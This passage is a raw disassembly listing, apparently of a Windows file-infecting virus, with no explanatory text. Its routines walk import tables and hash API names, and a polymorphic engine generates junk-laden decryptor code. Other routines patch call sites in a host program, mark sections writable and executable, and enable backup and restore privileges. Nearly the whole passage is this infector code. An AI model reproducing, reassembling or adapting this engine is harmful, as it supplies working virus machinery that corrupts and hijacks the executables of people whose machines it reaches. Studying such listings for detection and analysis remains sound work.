loc_48749C: ; CODE XREF: fuck:0048748A�j
; sub_4874CA+34�j
cmp dword ptr [edx], 0
jz short loc_4874A6
sub esi, [edx]
add esi, [edx+10h]
loc_4874A6: ; CODE XREF: sub_4874CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_4874B5
push dword ptr [edx]
jmp short loc_4874B8
; ---------------------------------------------------------------------------
loc_4874B5: ; CODE XREF: sub_4874CA-1B�j
push dword ptr [edx+10h]
loc_4874B8: ; CODE XREF: sub_4874CA-17�j
call sub_487414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_4874CA
; =============== S U B R O U T I N E =======================================
sub_4874CA proc near ; CODE XREF: fuck:00487461�p
; FUNCTION CHUNK AT 0048749C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_48751B
mov eax, [ebp+1042D0h]
call near ptr dword_486B50+43h
call sub_487507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_487500
mov [ebp+102410h], ebx
jmp short loc_48749C
; ---------------------------------------------------------------------------
loc_487500: ; CODE XREF: sub_4874CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_4874CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_487507 proc near ; CODE XREF: sub_4874CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_48751B
xor ecx, ecx
retn
sub_487507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48751B proc near ; CODE XREF: sub_4874CA+10�p
; sub_487507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_487414
add edx, [ebp+1042F8h]
add edx, esi
loc_48752F: ; CODE XREF: sub_48751B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_487640
cmp dword ptr [edx+10h], 0
jz locret_487640
mov eax, [edx+0Ch]
push eax
call sub_487414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_487555: ; CODE XREF: sub_48751B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_487575
cmp cl, 2Eh
jz short loc_487564
loc_487561: ; CODE XREF: sub_48751B+58�j
inc eax
jmp short loc_487555
; ---------------------------------------------------------------------------
loc_487564: ; CODE XREF: sub_48751B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_487561
loc_487575: ; CODE XREF: sub_48751B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_487638
cmp word ptr [eax-2], 3233h
jnz loc_487638
push esi
cmp dword ptr [edx], 0
jnz short loc_487598
mov ecx, [edx+10h]
jmp short loc_48759A
; ---------------------------------------------------------------------------
loc_487598: ; CODE XREF: sub_48751B+76�j
mov ecx, [edx]
loc_48759A: ; CODE XREF: sub_48751B+7B�j
add esi, ecx
push ecx
call sub_487414
add esi, [ebp+1042F8h]
loc_4875A8: ; CODE XREF: sub_48751B+90�j
; sub_48751B+117�j
lodsd
test eax, eax
js short loc_4875A8
jz loc_487637
push dword ptr [ebp+1042F8h]
push eax
call sub_487414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_4875D4: ; CODE XREF: sub_48751B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_4875EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_4875D4
; ---------------------------------------------------------------------------
loc_4875EB: ; CODE XREF: sub_48751B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_487631
cmp ebx, 0DB6E45A8h
jz short loc_487631
cmp ebx, 0FFA13B59h
jz short loc_487631
cmp ebx, 0ACB522D6h
jz short loc_487631
cmp ebx, 0F358E993h
jz short loc_487631
cmp ebx, 0F358E97Dh
jz short loc_487631
cmp ebx, 0E1253F46h
jz short loc_487631
cmp ebx, 0E1253F30h
jz short loc_487631
call dword ptr [ebp+1042D4h]
loc_487631: ; CODE XREF: sub_48751B+D6�j
; sub_48751B+DE�j ...
pop ebx
jmp loc_4875A8
; ---------------------------------------------------------------------------
loc_487637: ; CODE XREF: sub_48751B+92�j
pop esi
loc_487638: ; CODE XREF: sub_48751B+60�j
; sub_48751B+6C�j
add edx, 14h
jmp loc_48752F
; ---------------------------------------------------------------------------
locret_487640: ; CODE XREF: sub_48751B+18�j
; sub_48751B+22�j
retn
sub_48751B endp
; ---------------------------------------------------------------------------
align 2
dw 46Ah
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_4876D6
or ax, 2589h
jmp short loc_4876E9
; ---------------------------------------------------------------------------
loc_4876D6: ; CODE XREF: fuck:004876CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_4876E5
or ax, 2531h
jmp short loc_4876E9
; ---------------------------------------------------------------------------
loc_4876E5: ; CODE XREF: fuck:004876DD�j
or ax, 2501h
loc_4876E9: ; CODE XREF: fuck:004876D4�j
; fuck:004876E3�j
stosw
call near ptr dword_487644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_4876FB proc near ; CODE XREF: fuck:00487D47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_487644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_487723
rdtsc
jmp short loc_487725
; ---------------------------------------------------------------------------
loc_487723: ; CODE XREF: sub_4876FB+22�j
sub eax, eax
loc_487725: ; CODE XREF: sub_4876FB+26�j
stosd
retn
sub_4876FB endp
; =============== S U B R O U T I N E =======================================
sub_487727 proc near ; CODE XREF: fuck:loc_487D51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_48775A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_48776C
; ---------------------------------------------------------------------------
loc_48775A: ; CODE XREF: sub_487727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_48776C: ; CODE XREF: sub_487727+31�j
retn
sub_487727 endp
; =============== S U B R O U T I N E =======================================
sub_48776D proc near ; CODE XREF: sub_4877DF:loc_487806�p
; sub_4877DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_48779B
; ---------------------------------------------------------------------------
loc_487776: ; CODE XREF: sub_48776D+44�j
mov al, 0FCh
jmp short loc_48779A
; ---------------------------------------------------------------------------
loc_48777A: ; CODE XREF: sub_48776D+48�j
mov ax, 0EBh
stosw
jmp short loc_48779B
; ---------------------------------------------------------------------------
loc_487782: ; CODE XREF: sub_48776D+4C�j
push 4
pop eax
call near ptr dword_486B50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_48779B
; ---------------------------------------------------------------------------
loc_487798: ; CODE XREF: sub_48776D+50�j
mov al, 90h
loc_48779A: ; CODE XREF: sub_48776D+B�j
; sub_48776D+60�j ...
stosb
loc_48779B: ; CODE XREF: sub_48776D+7�j
; sub_48776D+13�j ...
push 15h
pop eax
call near ptr dword_486B50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_4877DE
test dl, dl
jz short loc_487776
dec dl
jz short loc_48777A
dec dl
jz short loc_487782
dec dl
jz short loc_487798
dec dl
jz short loc_4877CF
dec dl
jz short loc_4877D6
dec dl
jz short loc_4877DA
mov al, 0F9h
jmp short loc_48779A
; ---------------------------------------------------------------------------
loc_4877CF: ; CODE XREF: sub_48776D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_48779A
; ---------------------------------------------------------------------------
loc_4877D6: ; CODE XREF: sub_48776D+58�j
mov al, 0F5h
jmp short loc_48779A
; ---------------------------------------------------------------------------
loc_4877DA: ; CODE XREF: sub_48776D+5C�j
mov al, 0F8h
jmp short loc_48779A
; ---------------------------------------------------------------------------
locret_4877DE: ; CODE XREF: sub_48776D+40�j
retn
sub_48776D endp
; =============== S U B R O U T I N E =======================================
sub_4877DF proc near ; CODE XREF: fuck:loc_487C28�p
; fuck:00487DDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_4877EF
add al, 4
loc_4877EF: ; CODE XREF: sub_4877DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_487806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_487806: ; CODE XREF: sub_4877DF+1E�j
call sub_48776D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_48781D
mov ah, 29h
loc_48781D: ; CODE XREF: sub_4877DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_48776D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_487840
mov al, 86h
loc_487840: ; CODE XREF: sub_4877DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_487854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_487854: ; CODE XREF: sub_4877DF+6C�j
retn
sub_4877DF endp
; ---------------------------------------------------------------------------
loc_487855: ; CODE XREF: sub_48845B+183�p
lea edi, [ebp+1039CCh]
call sub_48776D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_48786F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_48786F db 0F7h ; ; CODE XREF: fuck:0048786A�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_487B00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_487B00: ; CODE XREF: fuck:00487AF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_487B17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_487B54
; ---------------------------------------------------------------------------
loc_487B17: ; CODE XREF: fuck:00487B0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_487B29
mov al, 29h
loc_487B29: ; CODE XREF: fuck:00487B25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_487B4C
mov ah, 0C8h
loc_487B4C: ; CODE XREF: fuck:00487B48�j
or ah, [ebp+1039B9h]
stosw
loc_487B54: ; CODE XREF: fuck:00487B15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_487BDD
call sub_48776D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_487B88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_487BD5
; ---------------------------------------------------------------------------
loc_487B88: ; CODE XREF: fuck:00487B7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_487BA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_487BBA
; ---------------------------------------------------------------------------
loc_487BA5: ; CODE XREF: fuck:00487B92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_487BBA: ; CODE XREF: fuck:00487BA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_487BCD
add ah, 8
loc_487BCD: ; CODE XREF: fuck:00487BC8�j
or ah, [ebp+1039BAh]
stosw
loc_487BD5: ; CODE XREF: fuck:00487B86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_487BDD: ; CODE XREF: fuck:00487B6A�j
call sub_48776D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_487BFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_48776D
loc_487BFC: ; CODE XREF: fuck:00487BEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_487C28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_487C2D
; ---------------------------------------------------------------------------
loc_487C28: ; CODE XREF: fuck:00487C0F�j
call sub_4877DF
loc_487C2D: ; CODE XREF: fuck:00487C26�j
call sub_48776D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_487C49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_487C58
; ---------------------------------------------------------------------------
loc_487C49: ; CODE XREF: fuck:00487C3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_487C58: ; CODE XREF: fuck:00487C47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_487C93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_487C8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_487C92
; ---------------------------------------------------------------------------
loc_487C8A: ; CODE XREF: fuck:00487C6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_487C92: ; CODE XREF: fuck:00487C88�j
stosb
loc_487C93: ; CODE XREF: fuck:00487C62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_487CAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_487CB7
; ---------------------------------------------------------------------------
loc_487CAF: ; CODE XREF: fuck:00487C9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_487CB7: ; CODE XREF: fuck:00487CAD�j
stosb
call sub_48776D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_487CF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_487D0B
mov cl, 77h
jmp short loc_487D0B
; ---------------------------------------------------------------------------
loc_487CF0: ; CODE XREF: fuck:00487CC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_487D0B: ; CODE XREF: fuck:00487CEA�j
; fuck:00487CEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_48776D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_487D5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_487D5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_487D51
call sub_4876FB
call sub_48776D
loc_487D51: ; CODE XREF: fuck:00487D45�j
call sub_487727
call sub_48776D
loc_487D5B: ; CODE XREF: fuck:00487D2D�j
; fuck:00487D39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_487D6F
mov al, 0C9h
stosb
call sub_48776D
loc_487D6F: ; CODE XREF: fuck:00487D65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_487DA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_48776D
mov al, 61h
stosb
call sub_48776D
loc_487DA5: ; CODE XREF: fuck:00487D79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_48776D
test dword ptr [ebp+1039C0h], 20h
jz short loc_487E31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_487DED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_4877DF
call sub_48776D
mov al, 0C3h
stosb
call sub_48776D
loc_487DED: ; CODE XREF: fuck:00487DCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_48776D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_487E20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_487E2A
; ---------------------------------------------------------------------------
loc_487E20: ; CODE XREF: fuck:00487E12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_487E2A: ; CODE XREF: fuck:00487E1E�j
stosw
call sub_48776D
loc_487E31: ; CODE XREF: fuck:00487DC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_487E9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_487E66
lea eax, [ebp+1039B8h]
loc_487E5E: ; CODE XREF: fuck:00487E64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_487E5E
loc_487E66: ; CODE XREF: fuck:00487E56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_487E7B
mov ax, 0C031h
stosw
loc_487E7B: ; CODE XREF: fuck:00487E73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_487E94
mov ax, 0C031h
stosw
loc_487E94: ; CODE XREF: fuck:00487E8C�j
mov al, 0C3h
stosb
call sub_48776D
loc_487E9C: ; CODE XREF: fuck:00487E3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_487EB4
push edi
sub edi, eax
pop eax
jmp short loc_487ECD
; ---------------------------------------------------------------------------
loc_487EB4: ; CODE XREF: fuck:00487EAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_487ECD: ; CODE XREF: fuck:00487EB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_487EED
neg eax
loc_487EED: ; CODE XREF: fuck:00487EE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_487EF1 proc near ; CODE XREF: sub_48845B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_4880D9
call near ptr loc_487F11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_487F11: ; CODE XREF: sub_487EF1+F�p
add bh, bh
sub_487EF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_487414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_487414
mov edi, [ebp+1042F4h]
push esi
call sub_487414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4880D9
jz loc_4880D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_4880AA
loc_487F8B: ; CODE XREF: sub_4880AA+29�j
lodsb
cmp al, 0E8h
jnz loc_488036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_487414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_487FB9
cmp eax, [edi+0Ch]
jnb loc_4880D2
jmp short loc_487FC5
; ---------------------------------------------------------------------------
loc_487FB9: ; CODE XREF: sub_4880AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_4880D2
loc_487FC5: ; CODE XREF: sub_4880AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4880D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_487414
cmp [ebp+1042F4h], edi
jnz loc_4880D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4880D2
cmp eax, [edi+8]
jnb loc_4880D2
loc_48800E: ; CODE XREF: sub_4880AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4880E8
jmp loc_4880D2
; ---------------------------------------------------------------------------
loc_488036: ; CODE XREF: sub_4880AA-11C�j
cmp al, 0FFh
jnz loc_4880D2
cmp byte ptr [esi], 15h
jnz loc_4880D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_487414
cmp [ebp+1042F4h], edi
jnz short loc_4880D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_48807F
cmp eax, [ebp+10431Ch]
jb short loc_4880E8
loc_48807F: ; CODE XREF: sub_4880AA-35�j
cmp eax, 70000000h
jb short loc_4880BD
call sub_4880AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_4880A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4880C4
; ---------------------------------------------------------------------------
locret_4880A9: ; CODE XREF: sub_4880AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_4880AA
; =============== S U B R O U T I N E =======================================
sub_4880AA proc near ; CODE XREF: sub_4880AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 00487F8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_48751B
popa
loc_4880BD: ; CODE XREF: sub_4880AA-26�j
test eax, 80000000h
jnz short loc_4880D2
loc_4880C4: ; CODE XREF: sub_4880AA-3�j
sub eax, [edi+0Ch]
jb short loc_4880D2
cmp eax, [edi+8]
jb loc_48800E
loc_4880D2: ; CODE XREF: sub_4880AA-F9�j
; sub_4880AA-EB�j ...
dec ecx
jnz loc_487F8B
loc_4880D9: ; CODE XREF: sub_487EF1+9�j
; fuck:00487F73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_48812A
; ---------------------------------------------------------------------------
loc_4880E8: ; CODE XREF: sub_4880AA-7F�j
; sub_4880AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_48812A: ; CODE XREF: sub_4880AA+3C�j
pop edi
pop esi
retn
sub_4880AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48812D proc near ; CODE XREF: fuck:0048842E�p
; FUNCTION CHUNK AT 00488257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_488257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_488257
call sub_4865AF
call near ptr loc_488168+5
push ebx
db 65h
jz short near ptr unk_4881A6
imul ebp, [ebp+53h], 72756365h
loc_488168: ; CODE XREF: sub_48812D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_48812D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_48819C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_488203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_48819C: ; CODE XREF: fuck:0048817F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_4881A6 db 0 ; CODE XREF: sub_48812D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_488203: ; CODE XREF: fuck:0048818D�j
lea eax, [ebp+103DCCh]
push 64h
